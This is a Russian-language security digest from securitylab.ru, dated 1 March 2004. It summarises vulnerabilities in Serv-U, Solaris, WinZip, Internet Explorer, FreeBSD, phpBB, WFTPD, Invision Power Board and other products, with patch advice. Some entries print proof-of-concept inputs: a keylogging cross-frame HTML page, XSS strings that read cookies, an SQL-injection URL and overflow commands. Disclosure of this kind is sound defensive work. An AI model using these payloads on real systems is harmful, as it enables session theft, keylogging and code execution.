Описание: Переполнение буфера обнаружено в Serv-U FTP Server. Удаленный авторизованный пользователь может выполнить произвольный код на целевой системе.

Удаленный авторизованный пользователь может представить специально обработанную команду MDTM, чтобы вызвать переполнение буфера и выполнить произвольный код в SYSTEM привилегиями.

Пример/Эксплоит:

MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA /test.txt

URL производителя: http://www.serv-u.com/

Решение:Установите обновленную версию программы (5.0.0.4): http://www.serv-u.com/customer/record.asp?prod=su

Повышение локальных привилегий через passwd(1) в Sun Solaris

1 марта | securitylab.ru

Программа: Sun Solaris 8,9

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Sun Solaris в команде passwd(1). Локальный пользователь может получить root привилегии.

Sun не раскрывает природу уязвимости.

URL производителя:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57454

Решение:Установите соответствующее обновление:

SPARC Platform

Solaris 8 with patch 108993-32 or later
Solaris 9 with patch 113476-11 or later

x86 Platform

Solaris 8 with patch 108994-32 or later
Solaris 9 with patch 114242-07 or later

Удаленное переполнение буфера в Dell OpenManage Server

1 марта | securitylab.ru

Программа: Dell OpenManage Server 3.7.0 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Переполнение буфера обнаружено в Dell OpenManage Server. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может послать специально обработанный HTTP POST запрос к целевому серверу на 1311 TCP порту, содержащий чрезмерно длинные значения скрытых переменных, чтобы вызвать переполнение буфера и выполнить произвольный код на целевой системе.

URL производителя: http://www.dell.com/

Решение:Нет

Поднятие локальных привилегий в Sun Solaris '/usr/lib/print/conv_fix'

1 марта | securitylab.ru

Программа: Sun Solaris 7,8,9

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Sun Solaris '/usr/lib/print/conv_fix' приложении. Локальный пользователь может получить поднятые привилегии.

Уязвимость связана с небезопасным вызовом функции fopen(). Локальный пользователь может использовать conv_lpd(1M) в '/usr/lib/print/conv_fix' чтобы создавать произвольные файлы на системе с root привилегиями.

URL производителя:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57509

Решение:Установите соответствующее обновление:

SPARC Platform

Solaris 7 with patch 107115-14 or later
Solaris 8 with patch 109320-09 or later
Solaris 9 with patch 113329-05 or later

x86 Platform

Solaris 7 with patch 107116-14 or later
Solaris 8 with patch 109321-09 or later
Solaris 9 with patch 114980-05 or later

Переполнение буфера при обработке MIME архивов в WinZip

1 марта | securitylab.ru

Программа: WinZip до версии 9.0

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в WinZip в обработке MIME архивов. Удаленный пользователь может выполнить произвольный код на целевой системе.

Переполнение обнаружено в UUDeview компоненте. Удаленный пользователь может сконструировать MIME архив (.mim, .uue, .uu, .b64, .bhx, .hqx, and .xxe расширения) который, когда будет открыть целевым пользователем, аварийно завершит работу WinZip или выполнить произвольный код с привилегиями текущего пользователя.

URL производителя:http://www.winzip.com/

Решение:Установите WinZip 9.0 Final.

Утечка нажатых клавиш между фреймами в Microsoft Internet Explorer (IE)

1 марта | securitylab.ru

Программа: Microsoft Internet Explorer (IE) 5.х, 6.0

Опасность: Низкая

Наличие эксплоита: Да

Описание: Кросс доменная уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может контролировать нажатие клавиш целевым пользователем внутри frameset.

Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, обойдет ограничения, наложенные на перекрестные сценарии фреймов.

В результате удаленный пользователь может сконструировать злонамеренный HMTL, который будет может контролировать нажатие клавиш целевым пользователем в целевом frameset.

Пример/Эксплоит:

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
    k = window.event.keyCode;
    window.status = keylog += String.fromCharCode(k) + '[' + k +']';
 
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>

URL производителя: http://www.microsoft.com/technet/security/

Решение: Microsoft не считает обнаруженную проблему уязвимостью.

Раскрытие PAP/CHAP опознавательных мандатов в pppd на Mac OS X

1 марта | securitylab.ru

Программа: Mac OS X pppd 2.4.0

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость форматной строки обнаружена в pppd на Mac OS X. Локальный пользователь может получить PAP/CHAP опознавательные мандаты.

Локальный пользователь может прочитать произвольные данные из памяти pppd процесса. В некоторых случаях, в которых целевая система использует ppp сервер, локальный пользователь может просматривать PAP/CHAP опознавательные мандаты.

Уязвимость расположена в функции option_error __V().

URL производителя:http://www.apple.com/

Решение:Установите соответствующее обновление:

Security Update 2004-02-23 is available at:

* Software Update pane in System Preferences (Mac OS X 10.3.2 and Mac OS X 10.2.8)

* Apple's Software Downloads web site:

Mac OS X 10.3.2 Client
======================
http://www.info.apple.com/kbnum/n120323
The download file is named: "SecUpd2004-02-23Pan.dmg"
Its SHA-1 digest is: dfe48ca16839e693674cf55995986f11d8282777

Mac OS X 10.3.2 Server
======================
http://www.info.apple.com/kbnum/n120324
The download file is named: "SecUpdSrvr2004-02-23Pan.dmg"
Its SHA-1 digest is: cde0a40abe3c1451458b15c01b73910b18bc4530

Mac OS X 10.2.8 Client
======================
http://www.info.apple.com/kbnum/n120277
The download file is named: "SecUpd2004-02-23Jag.dmg"
Its SHA-1 digest is: 4ec49f05f206649353ae20edd9b87ddb0b42a84b

Mac OS X 10.2.8 Server
======================
http://www.info.apple.com/kbnum/n120322
The download file is named: "SecUpdSrvr2004-02-23Jag.dmg"
Its SHA-1 digest is: 79617234d288d45208531622a38f307a978f82d7

Доступ к другим Jail из суперпользовательского Jail процесса в FreeBSD ядре

1 марта | securitylab.ru

Программа: FreeBSD 5.2.1-RC2 и предыдущие 5.х версии

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в FreeBSD ядре. Суперпользовательский процесс в пределах пространства пользователя (jail), может получить полный доступ к другому jail на целевой системе.

Уязвимость обнаружена в системном вызове jail_attach(2) в проверке привилегий. В результате процесс с привилегиями суперпользователя внутри одного jail может изменить свой root каталог к каталогу отличного целевого jail. Процесс получит полный доступ на чтение и запись к файлам и директориям внутри целевого jail.

URL производителя: http://www.freebsd.org/security/

Решение:Установите обновление согласно инструкции:

"1) Upgrade your vulnerable system to 5.2.1-RELEASE, or to the RELENG_5_2 or
 RELENG_5_1 security branch dated after the correction date.

OR

2) Patch your present system:

The following patch has been verified to apply to FreeBSD 5.1 and 5.2 systems.

a) Download the relevant patch from the location below, and verify the detached 
PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:03/jail.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:03/jail.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:http://www.freebsd.org/handbook/kernelconfig.html>
 and reboot the system."

Межсайтовый скриптинг в phpBB форуме

1 марта | securitylab.ru

Программа: phpBB 2.0.6c

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в phpBB в 'viewtopic.php'. Удаленный пользователь может выполнить XSS нападение.

Уязвимость обнаруженав параметре 'postorder' в сценарии 'viewtopic.php'. Пример:

http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69%70%74
%3E%61%6C%65%72%74%28%64%6F%63%7 5%6D%65%6E%74%2E%63%6F%6F%6B%
69%65%

URL производителя: http://www.phpbb.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Повышение локальных привилегий через Calife

1 марта | securitylab.ru

Программа: Calife 2.8.6

Опасность: Низкая

Наличие эксплоита: Да

Описание: Перепронение динамической памяти обнаружено в Calife. Локальный пользователь может получить root привилегии на целевой системе.

Локальный пользователь может представить чрезмерно длинный, специально сформированный пароль к приложению, чтобы вызвать ошибку сегментации и потенциально выполнить произвольный код с root привилегиями.

Пример/Эксплоит:

[downbload@localhost downbload]$ calife luser
Password: "A" x 3000
Password: real_user_password
Segmentation fault

URL производителя:http://mutt.frmug.org/calife/

Решение:Установите обновленную версию программы (2.8.6): ftp://ftp.frmug.org/pub/calife/latest.tar.gz

Удаленный отказ в обслуживании против Jabber Gadu-Gadu Transport

1 марта | securitylab.ru

Программа: Jabber Gadu-Gadu до версии 2.0.8

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Несколько уязвимостей обнаружено в Jabber Gadu-Gadu Transport. Удаленный пользователь может вызвать отказ в обслуживании на целевой системе.

Удаленный пользователь, зарегистрированный в системе, может перерегистрироваться чтобы заставить систему войти в бесконечный цикл.

URL производителя: http://www.jabberstudio.org/projects/jabber-gg-transport/project/view.php

Решение:Установите обновленную версию программы: http://www.jabberstudio.org/projects/jabber-gg-transport/releases/

Несколько уязвимостей в 602Pro LAN SUITE

1 марта | securitylab.ru

Программа: 602Pro LAN SUITE 1.0.4

Опасность: Не известно

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в 602Pro LAN SUITE. Удаленный пользователь может просматривать содержание директорий на системе, определить инсталляционный путь и выполнить XSS нападение.

1. Просмотр директорий:

http://<host>/index.html - directory listing
http://<host>/cgi-bin/
http://<host>/users/
2. Инсталляционный путь:
'http://<host>/mail/' в скрытой переменной 'Mail602Dir'
3. XSS
http://<host>/index.html/<script>alert('XSS')</script>
0

URL производителя:http://www.software602.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Несколько уязвимостей в iG Shop

1 марта | securitylab.ru

Программа: iG Shop 1.4

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в iG Shop. Удаленный атакующий может выполнить XSS нападение и нападение SQL инъекции.

1. SQL инъекция:

 page.php?page_type=catalog_products&type_id[]='[SQL Injection]&SESSION_ID={SESSION_ID}&SESSION_ID=
2. XSS нападение:
page.php?page_type=catalog_products&typ e_id[]=%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

URL производителя: http://www.igeneric.co.uk/PHP/iG_Scripts/11.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное переполнение буфера в WFTPD

1 марта | securitylab.ru

Программа: WFTPD Pro 3.21 Release 1, Pro 3.20 Release 2, 3.21 Release 1, 3.10 Release 1

Опасность: Высокая

Наличие эксплоита: Да

Описание: Переполнение буфера обнаружено в WFTPD. Удаленный авторизованный пользователь может выполнить произвольный код на целевой системе.

Удаленный авторизованный пользователь может послать специально сформированные LIST, NLST, или STAT команды, чтобы выполнить произвольный код на системе с SYSTEM привилегиями.

Пример/Эксплоит: http://www.securitylab.ru/_Exploits/2004/02/WFTPD.c.txt

URL производителя: http://www.wftpd.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный отказ в обслуживании против WFTPD сервера

1 марта | securitylab.ru

Программа: WFTPD Pro 3.21 Release 1

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Несколько уязвимостей отказа в обслуживании обнаружено в WFTPD. Удаленный авторизованный пользователь может заставить аварийно завершить работу сервера.

Удаленный авторизованный пользователь может послать буфер, длиннее 512 байт, который содержит символы без 0Ah байта, чтобы заставить FTP сервер выделить дополнительную память и аварийно завершить работу сервера.

Удаленный авторизованный пользователь с установленной опцией XeroxDocutech к 1 ("Servers\ \ Users\ \ XeroxDocutech" :DWORD :1) может использовать специально сформированные MKD или XMKD FTP команды, чтобы вызвать переполнение стекового буфера.

URL производителя:http://www.wftpd.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Межсайтовый скриптинг в Invision Power Board

1 марта | securitylab.ru

Программа: Invision Power Board 1.3 Final

Опасность: Низкая

Наличие эксплоита: Да

Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

Параметры 'c', 'f', 'showtopic', 'showuser', и 'username' не фильтруют HTML код, представленный пользователем:

http://[target]/?c='><script>alert(window.document.url)</script><plain text>
http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://[target]/?act=SR&f='><script>alert(document.cookie)</script>
http://[t arget]/?showuser='><script>alert(document.cookie)</script>
http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>

URL производителя:http://www.invisionboard.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Межсайтовый скриптинг в Free-BB

1 марта | securitylab.ru

Программа: Free-BB

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Free-BB. Удаленный пользователь может выполнить XSS нападение.

пример:

[couleur=expression(alert('unsecure'))]texte[/couleur]

[img]javascript:alert('unsecure')[/img]

URL производителя: http://www.free-bb.com/index.php

Решение:Установите обновленную версию программы




Инструменты управления содержанием Метод.ру
Дата создания документа: 18:32 01.03.04


http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное